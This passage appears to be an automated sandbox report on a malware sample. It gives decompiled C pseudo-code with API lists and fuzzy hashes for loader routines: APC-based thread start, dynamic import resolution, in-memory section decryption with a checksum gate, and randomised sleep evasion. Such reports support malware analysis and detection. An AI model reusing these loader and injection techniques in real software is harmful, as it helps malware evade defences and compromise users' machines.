                  						L8:
                  						E6E0C105D(_t56);
                  					} else {
                  						_t33 = GetProcAddress(_t50,  *0x6e0c4144 + 0x6e0c5161);
                  						 *(_t56 + 0x10) = _t33;
                  						if(_t33 == 0) {
                  							goto L8;
                  						} else {
                  							_t36 = GetProcAddress(_t50,  *0x6e0c4144 + 0x6e0c5174);
                  							 *(_t56 + 0x14) = _t36;
                  							if(_t36 == 0) {
                  								goto L8;
                  							} else {
                  								_t39 = GetProcAddress(_t50,  *0x6e0c4144 + 0x6e0c5189);
                  								 *(_t56 + 0x18) = _t39;
                  								if(_t39 == 0) {
                  									goto L8;
                  								} else {
                  									_t42 = GetProcAddress(_t50,  *0x6e0c4144 + 0x6e0c519f);
                  									 *(_t56 + 0x1c) = _t42;
                  									if(_t42 == 0) {
                  										goto L8;
                  									} else {
                  										 *((intOrPtr*)(_t56 + 8)) = _a8;
                  										 *((intOrPtr*)(_t56 + 4)) = _a4;
                  										_t46 = E6E0C145E(_t56, _a12); // executed
                  										_v8 = _t46;
                  										if(_t46 != 0) {
                  											goto L8;
                  										} else {
                  											 *_a16 = _t56;
                  										}
                  									}
                  								}
                  							}
                  						}
                  					}
                  				}
                  				return _v8;
                  			}













                  APIs
                    • Part of subcall function 6E0C1072: HeapAlloc.KERNEL32(00000000,?,6E0C1303,00000208,00000000,00000000,?,?,?,6E0C1DD8,?), ref: 6E0C107E
                  • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E0C1B92,?,?,?,?,?,00000002,?,?), ref: 6E0C189D
                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18BF
                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18D5
                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18EB
                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E0C1901
                  • GetProcAddress.KERNEL32(00000000,?), ref: 6E0C1917
                    • Part of subcall function 6E0C145E: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000), ref: 6E0C14BB
                    • Part of subcall function 6E0C145E: memset.NTDLL ref: 6E0C14DD
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                  • String ID:
                  • API String ID: 1632424568-0
                  • Opcode ID: e62607ebb55268dfb7771406d647a69c46022955586fa3a1c9ace71c9acdf1bb
                  • Instruction ID: cde3a2532a3aa305811328bc36634633be91429de1acccc8982895b1abe8356b
                  • Opcode Fuzzy Hash: e62607ebb55268dfb7771406d647a69c46022955586fa3a1c9ace71c9acdf1bb
                  • Instruction Fuzzy Hash: 14217FB5600A4BAFDB11DFAAC854E9EB7FCFF45B507004425E989D7210E770E909CB62
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                  				long _v8;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				char _t9;
                  				void* _t10;
                  				void* _t18;
                  				void* _t23;
                  				void* _t36;
                  
                  				_push(__ecx);
                  				_t9 = _a8;
                  				_v8 = 1;
                  				if(_t9 == 0) {
                  					_t10 = InterlockedDecrement(0x6e0c4108);
                  					__eflags = _t10;
                  					if(_t10 == 0) {
                  						__eflags =  *0x6e0c410c;
                  						if( *0x6e0c410c != 0) {
                  							_t36 = 0x2328;
                  							while(1) {
                  								SleepEx(0x64, 1);
                  								__eflags =  *0x6e0c4118;
                  								if( *0x6e0c4118 == 0) {
                  									break;
                  								}
                  								_t36 = _t36 - 0x64;
                  								__eflags = _t36;
                  								if(_t36 > 0) {
                  									continue;
                  								}
                  								break;
                  							}
                  							CloseHandle( *0x6e0c410c);
                  						}
                  						HeapDestroy( *0x6e0c4110);
                  					}
                  				} else {
                  					if(_t9 == 1 && InterlockedIncrement(0x6e0c4108) == 1) {
                  						_t18 = HeapCreate(0, 0x400000, 0); // executed
                  						 *0x6e0c4110 = _t18;
                  						_t41 = _t18;
                  						if(_t18 == 0) {
                  							L6:
                  							_v8 = 0;
                  						} else {
                  							 *0x6e0c4130 = _a4;
                  							asm("lock xadd [eax], edi");
                  							_push( &_a8);
                  							_t23 = E6E0C1F56(E6E0C1367, E6E0C1BFA(_a12, 1, 0x6e0c4118, _t41));
                  							 *0x6e0c410c = _t23;
                  							if(_t23 == 0) {
                  								asm("lock xadd [esi], eax");
                  								goto L6;
                  							}
                  						}
                  					}
                  				}
                  				return _v8;
                  			}













                  APIs
                  • InterlockedIncrement.KERNEL32(6E0C4108), ref: 6E0C1E96
                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E0C1EAB
                    • Part of subcall function 6E0C1F56: CreateThread.KERNELBASE ref: 6E0C1F6D
                    • Part of subcall function 6E0C1F56: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E0C1F82
                    • Part of subcall function 6E0C1F56: GetLastError.KERNEL32(00000000), ref: 6E0C1F8D
                    • Part of subcall function 6E0C1F56: TerminateThread.KERNEL32(00000000,00000000), ref: 6E0C1F97
                    • Part of subcall function 6E0C1F56: CloseHandle.KERNEL32(00000000), ref: 6E0C1F9E
                    • Part of subcall function 6E0C1F56: SetLastError.KERNEL32(00000000), ref: 6E0C1FA7
                  • InterlockedDecrement.KERNEL32(6E0C4108), ref: 6E0C1EFE
                  • SleepEx.KERNEL32(00000064,00000001), ref: 6E0C1F18
                  • CloseHandle.KERNEL32 ref: 6E0C1F34
                  • HeapDestroy.KERNEL32 ref: 6E0C1F40
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                  • String ID:
                  • API String ID: 2110400756-0
                  • Opcode ID: df78204875317c442a16d1c6f9ab47c71a4fbfe9b766fc6b6de8410e8299bd90
                  • Instruction ID: fe9ef626e04289eb8fb1dc4ff98ef055fccf1420dbad2fbe1d06063b94ff5717
                  • Opcode Fuzzy Hash: df78204875317c442a16d1c6f9ab47c71a4fbfe9b766fc6b6de8410e8299bd90
                  • Instruction Fuzzy Hash: BB216D32A10605BFCB409FE98C8CA4E3BB8F75AFA47204465FA59E3240D734894B8B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E00BBA1E3(void* __ecx, void* __edx, intOrPtr _a4) {
                  				struct _FILETIME _v12;
                  				void* _t10;
                  				void* _t12;
                  				int _t14;
                  				signed int _t16;
                  				void* _t18;
                  				signed int _t19;
                  				unsigned int _t23;
                  				void* _t26;
                  				signed int _t33;
                  
                  				_t26 = __edx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t10 = HeapCreate(0, 0x400000, 0); // executed
                  				 *0xbbd238 = _t10;
                  				if(_t10 != 0) {
                  					 *0xbbd1a8 = GetTickCount();
                  					_t12 = E00BB12ED(_a4);
                  					if(_t12 == 0) {
                  						do {
                  							GetSystemTimeAsFileTime( &_v12);
                  							_t14 = SwitchToThread();
                  							_t23 = _v12.dwHighDateTime;
                  							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                  							_push(0);
                  							_push(9);
                  							_push(_t23 >> 7);
                  							_push(_t16);
                  							L00BBB1E6();
                  							_t33 = _t14 + _t16;
                  							_t18 = E00BB673B(_a4, _t33);
                  							_t19 = 2;
                  							_t25 = _t33;
                  							Sleep(_t19 << _t33); // executed
                  						} while (_t18 == 1);
                  						if(E00BB19D0(_t25) != 0) {
                  							 *0xbbd260 = 1; // executed
                  						}
                  						_t12 = E00BB17EE(_t26); // executed
                  					}
                  				} else {
                  					_t12 = 8;
                  				}
                  				return _t12;
                  			}














                  APIs
                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00BB5C19,?), ref: 00BBA1F6
                  • GetTickCount.KERNEL32 ref: 00BBA20A
                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00BB5C19,?), ref: 00BBA226
                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,00BB5C19,?), ref: 00BBA22C
                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 00BBA249
                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,00BB5C19,?), ref: 00BBA263
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                  • String ID:
                  • API String ID: 507476733-0
                  • Opcode ID: 9c203c09e81a7894d03da71248f4c7c349849d75951f6e13965ffcbd185d61b9
                  • Instruction ID: ba474347f898e17440070d0cc03e2f2b17abee411afc8a2c90b673ca5dd381d5
                  • Opcode Fuzzy Hash: 9c203c09e81a7894d03da71248f4c7c349849d75951f6e13965ffcbd185d61b9
                  • Instruction Fuzzy Hash: BF11A572A44304AFE710ABA4DC5AFAA7BD8EF44350F404665F945DB190EEF5D8008666
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E6E0C1F56(long _a4, DWORD* _a12) {
                  				_Unknown_base(*)()* _v0;
                  				void* _t4;
                  				long _t6;
                  				long _t11;
                  				void* _t13;
                  
                  				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e0c4140, 0, _a12); // executed
                  				_t13 = _t4;
                  				if(_t13 != 0) {
                  					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                  					if(_t6 == 0) {
                  						_t11 = GetLastError();
                  						TerminateThread(_t13, _t11);
                  						CloseHandle(_t13);
                  						_t13 = 0;
                  						SetLastError(_t11);
                  					}
                  				}
                  				return _t13;
                  			}

                  APIs
                  • CreateThread.KERNELBASE ref: 6E0C1F6D
                  • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E0C1F82
                  • GetLastError.KERNEL32(00000000), ref: 6E0C1F8D
                  • TerminateThread.KERNEL32(00000000,00000000), ref: 6E0C1F97
                  • CloseHandle.KERNEL32(00000000), ref: 6E0C1F9E
                  • SetLastError.KERNEL32(00000000), ref: 6E0C1FA7
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                  • String ID:
                  • API String ID: 3832013932-0
                  • Opcode ID: e022c0f94afbfa8274dd5961ca0b0506162371b79c0d39c684f0ed94b72e647a
                  • Instruction ID: 29338841f65164b63b5029247127f28ef4c322fe4039d2b6aa0cd005d35a61c6
                  • Opcode Fuzzy Hash: e022c0f94afbfa8274dd5961ca0b0506162371b79c0d39c684f0ed94b72e647a
                  • Instruction Fuzzy Hash: A7F05E33214A20BFDB115BE08C1CF9EBB69FF0EF41F114444F605A1140C73988119BA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 57%
                  			E00BB17EE(signed int __edx) {
                  				signed int _v8;
                  				long _v12;
                  				CHAR* _v16;
                  				long _v20;
                  				void* __edi;
                  				void* __esi;
                  				void* _t21;
                  				CHAR* _t22;
                  				CHAR* _t25;
                  				intOrPtr _t26;
                  				void* _t27;
                  				void* _t31;
                  				void* _t32;
                  				CHAR* _t36;
                  				CHAR* _t42;
                  				CHAR* _t43;
                  				CHAR* _t44;
                  				CHAR* _t46;
                  				void* _t49;
                  				void* _t51;
                  				CHAR* _t54;
                  				signed char _t56;
                  				intOrPtr _t58;
                  				signed int _t59;
                  				void* _t62;
                  				CHAR* _t65;
                  				CHAR* _t66;
                  				char* _t67;
                  				void* _t68;
                  
                  				_t61 = __edx;
                  				_v20 = 0;
                  				_v8 = 0;
                  				_v12 = 0;
                  				_t21 = E00BB7B6E();
                  				if(_t21 != 0) {
                  					_t59 =  *0xbbd25c; // 0x2000000a
                  					_t55 = (_t59 & 0xf0000000) + _t21;
                  					 *0xbbd25c = (_t59 & 0xf0000000) + _t21;
                  				}
                  				_t22 =  *0xbbd164(0, 2); // executed
                  				_v16 = _t22;
                  				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                  					_t25 = E00BB5077( &_v8,  &_v20); // executed
                  					_t54 = _t25;
                  					_t26 =  *0xbbd2a4; // 0x2a5a5a8
                  					if( *0xbbd25c > 5) {
                  						_t8 = _t26 + 0xbbe5cd; // 0x4d283a53
                  						_t27 = _t8;
                  					} else {
                  						_t7 = _t26 + 0xbbea15; // 0x44283a44
                  						_t27 = _t7;
                  					}
                  					E00BB5A39(_t27, _t27);
                  					_t31 = E00BB165F(_t61,  &_v20,  &_v12); // executed
                  					if(_t31 == 0) {
                  						CloseHandle(_v20);
                  					}
                  					_t62 = 5;
                  					if(_t54 != _t62) {
                  						 *0xbbd270 =  *0xbbd270 ^ 0x81bbe65d;
                  						_t32 = E00BB98E4(0x60);
                  						 *0xbbd32c = _t32;
                  						__eflags = _t32;
                  						if(_t32 == 0) {
                  							_push(8);
                  							_pop(0);
                  						} else {
                  							memset(_t32, 0, 0x60);
                  							_t49 =  *0xbbd32c; // 0x36195b0
                  							_t68 = _t68 + 0xc;
                  							__imp__(_t49 + 0x40);
                  							_t51 =  *0xbbd32c; // 0x36195b0
                  							 *_t51 = 0xbbe836;
                  						}
                  						_t54 = 0;
                  						__eflags = 0;
                  						if(0 == 0) {
                  							_t36 = RtlAllocateHeap( *0xbbd238, 0, 0x43);
                  							 *0xbbd2c4 = _t36;
                  							__eflags = _t36;
                  							if(_t36 == 0) {
                  								_push(8);
                  								_pop(0);
                  							} else {
                  								_t56 =  *0xbbd25c; // 0x2000000a
                  								_t61 = _t56 & 0x000000ff;
                  								_t58 =  *0xbbd2a4; // 0x2a5a5a8
                  								_t13 = _t58 + 0xbbe55a; // 0x697a6f4d
                  								_t55 = _t13;
                  								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xbbc2a7);
                  							}
                  							_t54 = 0;
                  							__eflags = 0;
                  							if(0 == 0) {
                  								asm("sbb eax, eax");
                  								E00BB7EC1( ~_v8 &  *0xbbd270, 0xbbd00c); // executed
                  								_t42 = E00BB62D8(_t55); // executed
                  								_t54 = _t42;
                  								__eflags = _t54;
                  								if(_t54 != 0) {
                  									goto L30;
                  								}
                  								_t43 = E00BB8863(_t55); // executed
                  								__eflags = _t43;
                  								if(_t43 != 0) {
                  									__eflags = _v8;
                  									_t65 = _v12;
                  									if(_v8 != 0) {
                  										L29:
                  										_t44 = E00BB7780(_t61, _t65, _v8); // executed
                  										_t54 = _t44;
                  										goto L30;
                  									}
                  									__eflags = _t65;
                  									if(__eflags == 0) {
                  										goto L30;
                  									}
                  									_t46 = E00BB1E40(__eflags,  &(_t65[4])); // executed
                  									_t54 = _t46;
                  									__eflags = _t54;
                  									if(_t54 == 0) {
                  										goto L30;
                  									}
                  									goto L29;
                  								}
                  								_t54 = 8;
                  							}
                  						}
                  					} else {
                  						_t66 = _v12;
                  						if(_t66 == 0) {
                  							L30:
                  							if(_v16 == 0 || _v16 == 1) {
                  								 *0xbbd160();
                  							}
                  							goto L34;
                  						}
                  						_t67 =  &(_t66[4]);
                  						do {
                  						} while (E00BB13E3(_t62, _t67, 0, 1) == 0x4c7);
                  					}
                  					goto L30;
                  				} else {
                  					_t54 = _t22;
                  					L34:
                  					return _t54;
                  				}
                  			}

                  APIs
                    • Part of subcall function 00BB7B6E: GetModuleHandleA.KERNEL32(4C44544E,00000000,00BB1807,00000000,00000000), ref: 00BB7B7D
                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00BB1884
                    • Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0
                  • memset.NTDLL ref: 00BB18D3
                  • RtlInitializeCriticalSection.NTDLL(03619570), ref: 00BB18E4
                    • Part of subcall function 00BB1E40: memset.NTDLL ref: 00BB1E55
                    • Part of subcall function 00BB1E40: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00BB1E89
                    • Part of subcall function 00BB1E40: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00BB1E94
                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00BB190F
                  • wsprintfA.USER32 ref: 00BB193F
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                  • String ID:
                  • API String ID: 4246211962-0
                  • Opcode ID: 28456368eead6355a9baea026d2d9bb3d764294556e9a7013e7e99e1a3f2338c
                  • Instruction ID: 39cc15d981a2523cddfc96c9b44ab6755a8d4d3457b869349f69d794ca8c9cdd
                  • Opcode Fuzzy Hash: 28456368eead6355a9baea026d2d9bb3d764294556e9a7013e7e99e1a3f2338c
                  • Instruction Fuzzy Hash: 2851F371A01254AFDB20EBA8DCA5BFE77E8FB04700F9409A5F141E7261EAF4D905CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocString.OLEAUT32(80000002), ref: 00BB54C8
                  • SysAllocString.OLEAUT32(00BB9595), ref: 00BB550C
                  • SysFreeString.OLEAUT32(00000000), ref: 00BB5520
                  • SysFreeString.OLEAUT32(00000000), ref: 00BB552E
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: String$AllocFree
                  • String ID:
                  • API String ID: 344208780-0
                  • Opcode ID: 8877cfe0c1747bc626161779a136c9f452452a7559f96b7415aacb7fc18ddb93
                  • Instruction ID: 682b2cf3491c309a03d5efec615f74e274ff9ecad1e7257f865572dcd04857b7
                  • Opcode Fuzzy Hash: 8877cfe0c1747bc626161779a136c9f452452a7559f96b7415aacb7fc18ddb93
                  • Instruction Fuzzy Hash: E8311E71900549EFCB15DF98D8C4AEE7BF9EF18301B10445AE5069B250E7B1DA81CF61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E6E0C1C4E(void* __edi, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				unsigned int _v12;
                  				intOrPtr _v16;
                  				char _v20;
                  				void* _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				void* _v36;
                  				signed int _v44;
                  				signed int _v48;
                  				intOrPtr _t39;
                  				void* _t46;
                  				intOrPtr _t47;
                  				intOrPtr _t50;
                  				signed int _t59;
                  				signed int _t61;
                  				intOrPtr _t66;
                  				intOrPtr _t77;
                  				void* _t78;
                  				signed int _t80;
                  
                  				_t77 =  *0x6e0c4130;
                  				_t39 = E6E0C1FDA(_t77,  &_v20,  &_v12);
                  				_v16 = _t39;
                  				if(_t39 == 0) {
                  					asm("sbb ebx, ebx");
                  					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
                  					_t78 = _t77 + _v20;
                  					_v36 = _t78;
                  					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
                  					_v24 = _t46;
                  					if(_t46 == 0) {
                  						_v16 = 8;
                  					} else {
                  						_t61 = 0;
                  						if(_t59 <= 0) {
                  							_t47 =  *0x6e0c4140;
                  						} else {
                  							_t66 = _a4;
                  							_t50 = _t46 - _t78;
                  							_t11 = _t66 + 0x6e0c51a7; // 0x6e0c51a7
                  							_v28 = _t50;
                  							_v32 = _t50 + _t11;
                  							_v8 = _t78;
                  							while(1) {
                  								asm("movsd");
                  								asm("movsd");
                  								asm("movsd");
                  								_t19 = _t61 + 1; // 0x2
                  								_t80 = _t19;
                  								E6E0C15DC(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80, 0x400);
                  								_t64 = _v32;
                  								_v8 = _v8 + 0x1000;
                  								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
                  								_t61 = _t80;
                  								 *0x6e0c4140 = _t47;
                  								if(_t61 >= _t59) {
                  									break;
                  								}
                  								_t50 = _v28;
                  							}
                  						}
                  						if(_t47 != 0x63699bc3) {
                  							_v16 = 0xc;
                  						} else {
                  							memcpy(_v36, _v24, _v12);
                  						}
                  						VirtualFree(_v24, 0, 0x8000); // executed
                  					}
                  				}
                  				return _v16;
                  			}

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,6E0C1DAC,00003000,00000004,?,?,6E0C1DAC,00000000), ref: 6E0C1CA4
                  • memcpy.NTDLL(?,?,6E0C1DAC,?,?,6E0C1DAC,00000000), ref: 6E0C1D3B
                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E0C1DAC,00000000), ref: 6E0C1D56
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Virtual$AllocFreememcpy
                  • String ID: May 3 2021
                  • API String ID: 4010158826-2742910968
                  • Opcode ID: 24c23b93b3b81ec16247589b5034c93ddff692c5e859c699fbc2331d04e7a7dc
                  • Instruction ID: 9308839205e066e38ce212282538a46440ed2f613ddb2d3b85cd7f7153ed52ac
                  • Opcode Fuzzy Hash: 24c23b93b3b81ec16247589b5034c93ddff692c5e859c699fbc2331d04e7a7dc
                  • Instruction Fuzzy Hash: 04319275E0061AAFDF00CFD9D884BDEB7B5FF09B08F108165E944BB244D771AA0A8B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00BB769A(char* __eax) {
                  				char* _t8;
                  				intOrPtr _t12;
                  				char* _t21;
                  				signed int _t23;
                  				char* _t24;
                  				signed int _t26;
                  				void* _t27;
                  
                  				_t21 = __eax;
                  				_push(0x20);
                  				_t23 = 1;
                  				_push(__eax);
                  				while(1) {
                  					_t8 = StrChrA();
                  					if(_t8 == 0) {
                  						break;
                  					}
                  					_t23 = _t23 + 1;
                  					_push(0x20);
                  					_push( &(_t8[1]));
                  				}
                  				_t12 = E00BB98E4(_t23 << 2);
                  				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                  				if(_t12 != 0) {
                  					StrTrimA(_t21, 0xbbc2a4); // executed
                  					_t26 = 0;
                  					do {
                  						_t24 = StrChrA(_t21, 0x20);
                  						if(_t24 != 0) {
                  							 *_t24 = 0;
                  							_t24 =  &(_t24[1]);
                  							StrTrimA(_t24, 0xbbc2a4);
                  						}
                  						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                  						_t26 = _t26 + 1;
                  						_t21 = _t24;
                  					} while (_t24 != 0);
                  					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                  				}
                  				return 0;
                  			}

                  APIs
                  • StrChrA.SHLWAPI(?,00000020,00000000,036195AC,?,00BB1971,?,00BB1D89,036195AC,?,00BB1971), ref: 00BB76B4
                  • StrTrimA.KERNELBASE(?,00BBC2A4,00000002,?,00BB1971,?,00BB1D89,036195AC,?,00BB1971), ref: 00BB76D3
                  • StrChrA.SHLWAPI(?,00000020,?,00BB1971,?,00BB1D89,036195AC,?,00BB1971), ref: 00BB76DE
                  • StrTrimA.SHLWAPI(00000001,00BBC2A4,?,00BB1971,?,00BB1D89,036195AC,?,00BB1971), ref: 00BB76F0
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Trim
                  • String ID:
                  • API String ID: 3043112668-0
                  • Opcode ID: 693e2f5d7b844192aae91bc529b4da16ce35e1d4df8b9f6bd999659f8ea02372
                  • Instruction ID: 9f3da4534b5ad187c92dd8f94085c9fa6ec9c045819e1c0ff730aef7ded67d60
                  • Opcode Fuzzy Hash: 693e2f5d7b844192aae91bc529b4da16ce35e1d4df8b9f6bd999659f8ea02372
                  • Instruction Fuzzy Hash: 6101B5716497125FC2219F698C89F7BBFD8EB96B90F110598F846D7241DEE0CC02D6A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 87%
                  			E6E0C1367(void* __ecx, char _a4) {
                  				long _t3;
                  				int _t4;
                  				int _t9;
                  				void* _t13;
                  
                  				_t13 = GetCurrentThread();
                  				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                  				if(_t3 != 0) {
                  					SetThreadPriority(_t13, 0xffffffff); // executed
                  				}
                  				_t4 = E6E0C1D6E(_a4); // executed
                  				_t9 = _t4;
                  				if(_t9 == 0) {
                  					SetThreadPriority(_t13, _t4);
                  				}
                  				asm("lock xadd [eax], ecx");
                  				return _t9;
                  			}

                  APIs
                  • GetCurrentThread.KERNEL32 ref: 6E0C136A
                  • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E0C1375
                  • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E0C1388
                  • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E0C139B
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Thread$Priority$AffinityCurrentMask
                  • String ID:
                  • API String ID: 1452675757-0
                  • Opcode ID: a42fa253dae3a7c4e480aaa8aed80ada3fb718cddced4bd54fa8bae7491acfcf
                  • Instruction ID: 8e561207f88ee4aa2c0e7f32438c1a57872d2988a52e14f6bbe663c85d4142ee
                  • Opcode Fuzzy Hash: a42fa253dae3a7c4e480aaa8aed80ada3fb718cddced4bd54fa8bae7491acfcf
                  • Instruction Fuzzy Hash: 25E02B313166116BA60127A84C4CFAF77ACEF86B757110336F920C22D0CB748C0689B1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00BB86F0(void* __edx) {
                  				void* _v8;
                  				int _v12;
                  				WCHAR* _v16;
                  				void* __edi;
                  				void* __esi;
                  				void* _t23;
                  				intOrPtr _t24;
                  				void* _t26;
                  				intOrPtr _t32;
                  				intOrPtr _t35;
                  				intOrPtr _t38;
                  				void* _t40;
                  				intOrPtr _t42;
                  				void* _t45;
                  				void* _t50;
                  				void* _t52;
                  
                  				_t50 = __edx;
                  				_v12 = 0;
                  				_t23 = E00BB4EC8(0,  &_v8); // executed
                  				if(_t23 != 0) {
                  					_v8 = 0;
                  				}
                  				_t24 =  *0xbbd2a4; // 0x2a5a5a8
